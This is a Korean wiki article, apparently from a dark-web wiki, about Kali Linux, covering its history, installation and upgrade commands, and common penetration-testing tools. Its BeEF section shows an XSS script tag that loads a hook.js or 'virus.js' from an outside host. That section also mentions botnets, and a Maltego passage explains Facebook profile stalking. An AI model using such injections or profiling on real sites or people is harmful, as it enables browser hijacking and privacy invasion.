칼리 리넠스

From Hidden Wiki
(Redirected from 칼리 리눅스)
Jump to navigation Jump to search
필독 사항 유닠스 계열 저작물, 성인물, 도박 웹 써버 보안 프로그래밍 그래핔 파싱
필독 사항 고스트BSD 표면 웹 싸이트 제작 리눅스 마스터 파이썬 트킨터 뷰티펄 숲
수학 아이투피 마약, 아청물, 해킹 웹 싸이트 보안 웹 프로그래밍 데이터 분석 게임 제작
통계학 뮤와이어 다크넽 싸이트 제작 정보 보안 기사 쟁고우 팬더즈 파이게임

https://upload.wikimedia.org/wikipedia/commons/a/a6/Kali_Linux.png?width=640

Kali Linux

공식사이트

The quieter you become, the more you are able to hear "당신이 조용한 만큼 더 많이 들을 것이다"

  • 자세한 설치 및 사용 방법은 리눅스 문서 참조

개요

칼리 리눅스구글링만 있다면 당신도 훌륭한(?) 스크맆트 키디!!


Offensive Security에서 만든 BackTrack의 후속버전[* 혹은 정식버전으로도 볼 수 있다. BackTrack이 운영체제로써의 완성도는 타 배포판의 베타정도로 떨어졌었지만 Kali에서 끌어올렸다.][* Kali Linux 홈페이지의 설명은 'Rebirth of BackTrack, the Penetration Testing Distribution.'이다]으로 백트랙과 마찬가지로 각종 해킹 툴을 모아놓은 운영체제이다.


칼리 리눅스(Kali Linux)는 정보 보안을 테스트하기 위한 오픈 소스 리눅스 배포판인 백트랙의 후속버전이다.<ref>Template:웹 인용</ref> 이 안에는 백트랙처럼 수많은 해킹과 관련된 도구와 설명서들이 있다. 흥미로운 점은 백트랙우분투를 기반으로 했다면, 칼리 리눅스는 데비안을 기반으로 만들었다는 것이다. 칼리 리눅스는 칼리 리눅스 공식 사이트에서 ISO 이미지 파일 또는 토렌트 등을 이용하여 무료로 다운로드가 가능하다.<ref>Template:웹 인용</ref>


  • #11098 2019-4-21 오전 1:39 [삭제]

해커들은 전부 칼리 리눅스 쓰는게 정설?? 이게 좋은점이 뭔데?


1: 쓸데없는 드라이버 같은거 없이 해킹툴 잔뜩 모아져있는 리눅스 버전. 해커들도 뭐 간단한 것들은 굳이 다시 코딩할 필요없게 해주니까 칼리 리눅스 같은거 쓰겠지. 그렇다고 칼리 리눅스에 깔린 프로그램 가지고만 놀면 해커가 아니라 스크립트 키디지 뭐. [삭제] 2019-4-21 오전 1:54


2: >1 그 버전은 어디서 구함? 여러가지 깔기 귀찮아서 그런데.. [삭제] 2019-4-21 오후 6:35


3: >2 google -> kali linux -> x64 image download -> Live boot or Install [삭제] 2019-4-21 오후 8:18


4: >2 구글에 칼리리눅스 다운로드라고 쳐라 [삭제] 2019-4-21 오후 8:22


5: >2 그 버전이 아니라 칼리 리눅스가 해킹툴 모아놓은 리눅스 버전이라고. 설치 해보면 무슨 말인지 알것임 [삭제] 2019-4-21 오후 11:39


6: >5 친절한 형님은 ㅇㅂ야 !! [삭제] 2019-4-22 오전 1:36


7: 그 해킹 툴들 중에 실제로 쓰는 건 몇 개 없어서 그냥 자기가 좋아하는 리눅스 배포판에 자기가 쓰는 툴 몇 개만 깔아서 씀 [삭제] 2019-4-22 오전 2:40

http://jqu6my2mlqp4zuui.onion/p?id=11098

버전

첫 버전은 2013년 3월 13일에 공개되었고 2014년 7월 22일 UEFI 부팅을 추가한 1.0.8버전이 공개 되었다. Ubuntu 기반이던 BackTrack과 달리 Debian 기반으로 바뀌었고 데비안 개발기준을 충족한다. 배포판 업그레이드가 가능하므로 BackTrack과 달리 새버전이 나올때 마다 다시 설치할 필요가 없어졌다.

나머지는 BackTrack과 거의 동일하지만 Kali Linux 만의 특징이라고 한다면 BackTrack에서 동작하지 않거나 중복되는 것들을 제거하고 300개 이상의 침투테스트툴들을 잡아넣었으며 백트랙에서 상당히 미약했던 무선장치 지원을 대폭강화하였다. 거기다 ARM프로세서의 지원까지 추가해 Geek들이 열광하고 있으며 여러가지 ARM장비(라즈베리파이, 삼성 ARM 크롬북 등)에 설치되고 있다. 또한 설치하지 않더라도 Live CD나 Live USB와 같은 형태로 PC 등에 설치하지 않고도 부팅할 수 있어 부팅 가능한 Kali Linux 이미지가 들어 있는 DVD나 USB 메모리를 가지고 다니면서 침투 테스트를 진행할 수도 있다.

안드로이드에서도 리눅스 디플로이라는 앱을 이용해 칼리 리눅스 환경을 사용할 수 있다. 설치법 한가지 주의할 점은 링크된 블로그에서는 가상환경이라고 소개하고 있지만, 여기서 사용되는건 chroot이라는 프로그램으로 사실은 칼리에 포함된 패키지들을 안드로이드에 격리된 폴더를 만들어서 추가로 설치하는것에 가깝다. 커널을 제외하고는 모든 파일이 따로 설치되기에 실제로 운영체제가 하나 더 있는것과 거의 유사하지만, 커널의 드라이버가 툴과 호환되지 않는 경우는 해당 툴을 사용할 수 없다. 와이파이 해킹을 위해서는 드라이버가 툴에 의해 지원되는 와이파이 장치가 있어야 하는데 스마트폰의 와이파이 모듈은 지원되는 경우가 거의 없으므로 사실상 반쪽짜리라고 볼 수 있다.

2015년 1월, 칼리 리눅스의 공식 --안드로이드 롬인-- 넷헌터(NetHunter OS)가 출시됬다! 안드로이드가 기본으로 깔려 있는 폰에 추가 설치를 하는 방식이다. Wifite등의 기능을 지원해야 하기에 넥서스에서 지원되지 않는 OTG를 되게 하는 커널을 설치한다. MultiROM Manager를 이용해 하나는 메인OS로, 하나는 Kali Nethunter로 쓸 수 있다(예를 들어 넥서스4같은 경우 최신 버전인 5.1.1을 지원하지만, Kali Nethunter는 킷캣만을 지원하는데, 이 때 쓰는 방법). 지원 기종은 넥서스4(킷캣), 넥서스5(킷캣,롤리팝), 넥서스6(킷캣), 넥서스7 2012(킷캣), 넥서스7 2013(킷캣,롤리팝), 넥서스9(롤리팝), 넥서스10(킷캣,롤리팝)과 원플러스.

2015년 8월 11일, 칼리 리눅스 2.0이 출시됬다. (다운로드) 2.0이리는 타이틀이 붙어진 만큼 많은 것이 바뀌었다. 먼저 4.0kernel로 바뀌었으며 데스크탑 환경과 각종 툴도 업데이트 되었다. 기존의 사용자들은 삭제를 안하고 간단한 작업만 하면 버전업 할 수있다.


설치 방법

호스트 네임: 공유기 등 네트워크에서 컴퓨터 식별용 이름

도메인 네임: 안 써도 된다.

루트(root) 암호: 최고 관리자 암호. 적당히 지정해주면 된다. 보안상 별도의 사용자 계정을 만들고 되도록이면 root로 로그인해서 작업하기보다는 일반 사용자 계정에서 sudo 명령어로 작업하는 게 좋다. 설치가 끝난 후 root 계정 외에 별도의 사용자 계정을 만든다. root의 암호와 일반 사용자 계정의 암호는 서로 다른 게 보안상 더 안전하다. 자세한 방법은 리눅스 문서 참조.

디스크 파티션하기: 수동으로. 역시 리눅스 문서 참조.

USB 메모리 설치와 라이브 운영 체제

CD나 DVD 대신에 USB 메모리로 설치 디스크를 만들 수 있다. Rufus( https://rufus.akeo.ie/ )같은 소프트웨어를 사용하여 iso 이미지로 부팅 가능한 USB 메모리를 만들 수 있다. 하지만 Rufus를 써도 설치하지 않고 쓸 수 있는 라이브 운영 체제(live OS)로는 사용 가능하지만 막상 설치하려고 하면 CD 장치를 찾을 수 없다는 오류 메시지가 뜨면서 설치가 안 된다. 칼리 리눅스 운영진이 꼰대라 요즘에는 운영 체제를 USB로 설치한다는 사실을 모르는 모양이다.


Live DVD로 부팅했을 경우 10분 정도 작업을 안 하면 화면 보호기가 뜨고 다시 돌아가려면 root의 비밀번호를 쳐야 하는데 칼리 리눅스의 Live DVD의 기본 설정된 root 비밀 번호는 toor 이다.

업그레이드 방법

저장소 목록 업데이트

터미널에서

sudo apt-get update

명령어를 입력하면 된다.


무시:10 http://http.kali.org/kali kali-rolling/main Translation-en

무시:11 http://http.kali.org/kali kali-rolling/non-free amd64 Packages.diff/Index

무시:12 http://http.kali.org/kali kali-rolling/non-free all Packages

무시:16 http://http.kali.org/kali kali-rolling/contrib amd64 Packages.diff/Index

무시:17 http://http.kali.org/kali kali-rolling/contrib all Packages

무시:20 http://http.kali.org/kali kali-rolling/contrib Translation-en

오류:21 http://ftp.ne.jp/Linux/packages/kali/kali kali-rolling/main amd64 Packages

404 Not Found

패키지 목록을 읽는 중입니다... 완료

W: The repository 'http://http.kali.org/kali kali-rolling Release' does not have a Release file.

N: Data from such a repository can't be authenticated and is therefore potentially dangerous to use.

N: See apt-secure(8) manpage for repository creation and user configuration details.

E: Failed to fetch http://ftp.ne.jp/Linux/packages/kali/kali/dists/kali-rolling/main/binary-amd64/Packages 404 Not Found

E: Failed to fetch http://ftp.ne.jp/Linux/packages/kali/kali/dists/kali-rolling/non-free/binary-amd64/Packages 404 Not Found

E: Failed to fetch http://ftp.ne.jp/Linux/packages/kali/kali/dists/kali-rolling/contrib/binary-amd64/Packages 404 Not Found

E: Some index files failed to download. They have been ignored, or old ones used instead.


인터넷은 정상적으로 되는데 위와 같은 오류가 나면서 apt-get update가 안 될 경우 방화벽 등이 문제인 경우가 많다고 한다. 그럴 때는 유선 을 뽑고, 무선 으로 연결해보거나 다른 인터넷 회선으로 연결하면 되는 경우가 있다.

저장소를 바꾸고 싶은 경우 터미널에서

sudo leafpad /etc/apt/sources.list

를 입력하여 sources.list 파일을 수정해주면 된다. 칼리 리눅스는 sources.list에 아래 2개만 있으면 된다. 참고로 앞에 #이 있으면 주석이라 컴퓨터에서 무시하므로 없는 것과 마찬가지다. 가끔씩 deb-src가 필요한 경우가 있지만 평소에는 필요없으니 #을 넣어 주석 처리 해주면 된다.

deb http://repo.kali.org/kali kali-rolling main non-free contrib
# deb-src http://repo.kali.org/kali kali-rolling main non-free contrib

패키지 업그레이드

업그레이드 알림이 자동으로 뜨지 않는 경우에는 자기가 알아서 수동으로 업그레이드 해줘야 한다. "프로그램 -> Usual applications -> 시스템 도구 -> 패키지 업데이트"에 가서 업데이트 해주면 된다. 암호를 물어보면 root 암호를 넣어주면 된다.


또는 터미널을 열고

sudo apt-get update

를 입력하여 저장소의 패키지 정보를 업데이트 하고

sudo apt-get upgrade

로 소프트웨어를 업그레이드 한다.


오류가 뜨면서 업그레이드가 안 되면

sudo apt-get upgrade -f

처럼 뒤에 -f를 붙여서 강제로 업그레이드 시킨다.

배포판 업그레이드

칼리 리눅스 업그레이드 방법

터미널에서 다음의 명령어를 친다.

sudo apt-get update

그리고 다음의 명령어를 친다.

sudo apt-get dist-upgrade

그럼 끝이다.

해킹

사용 방법

--help, man

터미널에서 잘 모를 경우는 무조건 --help, man을 해보면 된다. 예를 들어 apt-get 명령어를 사용하려는데 어떻게 사용하려는지 잘 모르겠으면 아래 둘 중 하나를 입력해본다.

apt-get --help
man apt-get

man apt-get이 뜬 상태에서 help를 보려면 h를, 나가려면 q를 누르면 된다.

메타스플로잍 프로젴트

Metasploit Project, 메타스플로잍 프레임워크(Metasploit Framework)

  • Metasploit 기능 분석 2010.01.03

Metasploit은 취약점 점검에 편리하도록 익스플로잇을 모아놓은 ruby기반(version 3 이상, 그 이하 버전은 perl 기반)의 오픈소스 프레임워크로, 취약점에 대한 깊이 있는 지식이 없어도 간단하고 쉽게 취약점 점검이 가능합니다.

http://teamcrak.tistory.com/209


  • 윈도우버전 Metasploit 에서 사용자 exploit 사용하는법 2012.04.05

http://www.exploit-db.com/ 에 올라오는 POC 코드 중에 Metasploit 용 코드가 올라올때가 간혹 있다.

이때, 이 코드를 윈도우 기반의 Metasploit에서 사용하는 방법은 리눅스와 아주(?)작은 차이가 있는데

기본적으로 리눅스에서는 홈폴더에 있는 .msf4 폴더에 해당 rb 파일을 넣는다면, 윈도우 같은 경우엔 사용자 폴더에 있는 .msf 폴더에 넣어야 한다는 것이다.

좀더 정확한 경로는 아래와 같다.

C:\Users\사용자\.msf4\modules\exploits\임의의 경로

위 폴더 안에 넣어준 후에 Metasploit console 에서

use exploit\임의의 경로

명령어로 사용 할 수 있다.

http://blog.naver.com/PostView.nhn?blogId=pjy9954&logNo=70135379290


아미티지

Armitage

  • 백트랙(BackTrack) : 도도한 Armitage와의 첫 만남 2011.09.22

Armitage 은 바로 metasploit의 GUI 버전이라고 생각하시면 되요.

http://blog.naver.com/PostView.nhn?blogId=onyourlife&logNo=150119487167&redirect=Dlog&widgetTypeCall=true


  • 취약점 진단 (8)

http://lureout.tistory.com/53


  • Metasploit 02 Backtrack 5 R2 설치, Armitage 사용법 2012.09.07

http://netstat.tistory.com/17


  • [armitage] 기본적인 사용법 2012.10.09

http://zudongza.tistory.com/entry/armitage-%EA%B8%B0%EB%B3%B8%EC%A0%81%EC%9D%B8-%EC%82%AC%EC%9A%A9%EB%B2%95


버프 스위트

Burp Suite

  • 웹 애플리케이션 사전조사 및 스캐닝(1) - Burp Suite 2015.04.08

웹 애플리케이션을 사전조사하고 스캔하는 단계에서는 웹 애플리케이션을 구성하는 자원(페이지, 파일, 디렉토리, 링크, 이미지 등)에 대한 상세한 정보를 얻을 수 있다.

이러한 정보는 이후 웹 애플리케이션을 공격할 때 매우 중요한 정보로 사용된다.

웹 애플리케이션을 사전조사하는 방법에는 여러 가지가 있지만, 그 중 목표물을 공격하는 가장 훌륭한 방법은 "애플리케이션이 어떻게 동작하는지 완전히 이해"하는 것이다.

브라우저(클라이언트)가 웹 애플리케이션(서버)에 요청을 보내면 웹 애플리케이션은 브라우저에 응답을 회신한다.

이런 요청과 응답의 순환이 실제로 어떻게 동작하는지 프록시로 볼 수 있는데, 프록시가 브라우저와 웹 애플리케이션 중간에서 요청과 응답의 흐름을 제어할 수 있기 때문이다.

Burp Suite(이하, Burp)는 대표적인 프록시 도구로써 Kali에 기본으로 내장되어 있다.

http://scytalezz.tistory.com/84


말테고

Maltego

  • [칼리리눅스] Maltego에 대해 - Maltego 설치 방법 2014.04.11

Maltego는 데이타 수집을 목적으로 하는 서버/클라이언트 아키텍쳐를 사용하는데 실제 전 세계에 흩어져 있는 인터넷 상에 존재하는, 예를 들어 사람, 온라인 그룹(SNS와 같은), 그 사람이 속한 회사나 조직, 웹사이트, 인터넷 인프라(도메인, DNS 네임, Netblock, IP주소 와 같은)에 돌아다니는 데이타의 조각들 간의 관계를 수집하여 분석을 한다.

http://blog.naver.com/PostView.nhn?blogId=chogar&logNo=80210957759&redirect=Dlog&widgetTypeCall=true


  • 모의해킹 전문가에 관해서 궁금한것들이 있습니다. 2014/11/06

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Board&no=32972


  • 해킹의 사전준비를 위한 정보수집(nmap, zenmap, maltego) 2014.02.27

해킹을 하기 이전에는 사전준비가 필요하다.

상대를 알아야 해킹을 하건 말건 한다는것이다.

내가 아는 툴은 nmap, zenmap(사실상 nmap의 GUI버전), 말테고정도가 있는데, 세 툴 모두 칼리 리눅스에 기본적으로 탑재되어있다.

nmap은 포트스캐닝이나 네트워크 분석에 사용된다.

자신의 아이피가 192.168.0.10라고 가정. 근데 당신은 공유기의 관리자가 아니고 홈그룹에도 속해있지 않기 때문에 어떤 장치들이 현재 같은 네트워크를 사용중인지 열람할 수 없다.

다음으로, 말테고(maltego)

Paterva사에서 제공하는 말테고라는 툴이다.

칼리 리눅스에서 apt-get만 업데이트가 안 되는 몇 안되는 툴중 하나이다.

nmap과는 달리, IP뿐만이 아니라 공개된 신상정보, 관련된 타사, 링크가 걸린 웹사이트와 그 포스팅 등을 모두 보여준다. 어떤 원리로 작동하는진 나도 몰라[...]

특히 페이스북의 공개된 신상정보 스토킹을 잘 하는듯 하다.

<del>당신네 스크립트 키디들이 가장 좋아하는</del> 페이스북 스토킹을 하고싶다면 왼쪽 패널 리스트에서 Social Networking탭을 선택한 후 Facebook Affiliation을 끌어온 후, 프로필 주소와 이름을 적고 Transform을 시행하면 많은것들이 튀어나온다.

http://blog.naver.com/PostView.nhn?blogId=namjmnam&logNo=20205975010&redirect=Dlog&widgetTypeCall=true


비프(BeEF)

The Browser Exploitation Framework, 비프 XSS 프레임워크(BeEF XSS Framework)

  • (칼리리눅스/백트랙을 활용한 모의해킹) BeEF와 Metasploit 조합 2014.05.17

BeEF에서 메타스플로잇(Metasploit)의 모듈들을 사용할 수 있도록 지원하고 있다. 하지만 아래 그림에서 보듯이 메타스플로잇 카테고리는 존재 하지만 메타스플로잇의 모듈의 갯수는 0이다.

왜 그럴까?? 이유는 간단하다. BeEF에서 메타스플로잇 모듈을 사용할 수 있도록 지원을 하고 있지만, 기본적으로 비활성화 상태이기 때문에 몇가지 설정을 변경해 줘야 비로서 메타스플로잇 모듈을 사용할 수 있게 된다.

그럼 이제 부터 메타스플로잇을 BeEF에서 사용할 수 있도록 몇가지 설정을 변경해 보자. BeEF의 기본적인 설정은 Kali Linux를 기준으로, /usr/share/beef-xss/에 config.yaml 파일에서 담당한다.

vi 에디터등의 편집기를 이용하여, config.yaml 파일을 보면 가장 아랫 부분에 확장 모듈을 활성화/비활성화를 설정하는 부분이 나타난다. 여기서 메타스플로잇을 아래와 같이 enable: false을 enable: true로 변경 후 변경값을 저장한다.

http://blog.naver.com/PostView.nhn?blogId=chogar&logNo=220000745475&redirect=Dlog&widgetTypeCall=true


  • (워프프레스 플러그인 취약점과 모의해킹) BeEF 활용한 시나리오 2015.07.31

워드프레스 플러그인 내 XSS 취약점을 이용하여 Beef Framework를 통해 관리자PC를 장악하자.

http://blog.naver.com/PostView.nhn?blogId=chogar&logNo=220436811312&redirect=Dlog&widgetTypeCall=true


  • Kali 리눅스 시리즈 강좌의 BeEF 설치 및 통합 Metasploit 2015-01-06

http://www.programkr.com/blog/METMyEDMwYT3.html


  • 해킹: 공격의 예술

XSS 공격이란, 웹사이트에 어느 인풋이 있다면 그 인풋을 사용해 스크립트를 넣는것이다. 보통 스크립트를 넣을때는 자바스크립트를 실행하도록 만든다. 대충 이렇게 생겼다:

<script src=자바스크립트.js></script>

이걸 어떻게 넣어서 실행할 수 있게 만들면 "자바스크립트.js"가 실행된다. 예를 들면 유투브 덧글에 어떻게 자바스크립트를 내가 멋대로 넣어서 덧글을 보는 모든 사람들에게 자바스크립트가 실행되도록 만드는것.

그 취약점을 찾는건 자기 몫이다. 유명한 툴인 Burp Suite를 잘 사용하면 대충 스캔할 수 있다. 칼리 리눅스에도 톱10 툴 리스트 안에 들어있다. 물론, 이녀석은 웹스캐너지, XSS 공격 모듈은 아니다.

주로 js파일은 외부 주소에서 가져온다. 예를 들자면 이런 식: http://www.sibalseaki.com/virus.js

여기에 js파일을 제작하는 모듈이 있다. BeEF 프레임워크라고 하는데, XSS 공격 모듈을 만드는데에 특화되어있다.

BeEF로 웹서버를 운영하면 http://localhost:3000/hook.js 라는 js파일이 생성된다. 그럼 이 일이 가능하다:

<script src=</script>">http://내아이피:3000/hook.js></script>

여기서 hook.js 파일은 BeEF 웹 설정에서 알아서 정할 수 있다. 그 예로 가짜 페이스북 자바스크립트가 있음[...] 잘못하면 봇넷 형성이 가능해진다. 당연히, 아이피는 고정아이피여야 하며, 포트포워딩이 되어있어야 함.

아주 오래전에 유투브 XSS 취약점이 유행했다. 대부분은 자기 덧글 내용에 색깔을 넣거나 유저네임에 특수한 이펙트를 주거나 하는 경우였지만, 잘못 사용하면 악성 js파일을 실행시킬 수 있다. 물론 지금은 그 취약점은 패치됨.

https://www.facebook.com/allstyle18/posts/796447083761273?_fb_noscript=1


패러데이(Faraday)

패러데이 IDE(Faraday IDE). 패러데이는 네트워크 침입 테스트용 툴이다.

https://www.faradaysec.com/

https://github.com/infobyte/faraday


리프패드

Leafpad는 텍스트 편집기이다.

  • 가벼운 편집기 leafpad 설치와 문서파일 연결하기 2013.11.26

leafpad윈도우메모장과 같은 매우 가벼운 편집기로 우분투의 기본 편집기인 gedit가 무겁게 느껴지신다면 leafpad를 사용해 보시기 바랍니다.

http://metdol.tistory.com/28

관련 항목

외부 링크

참조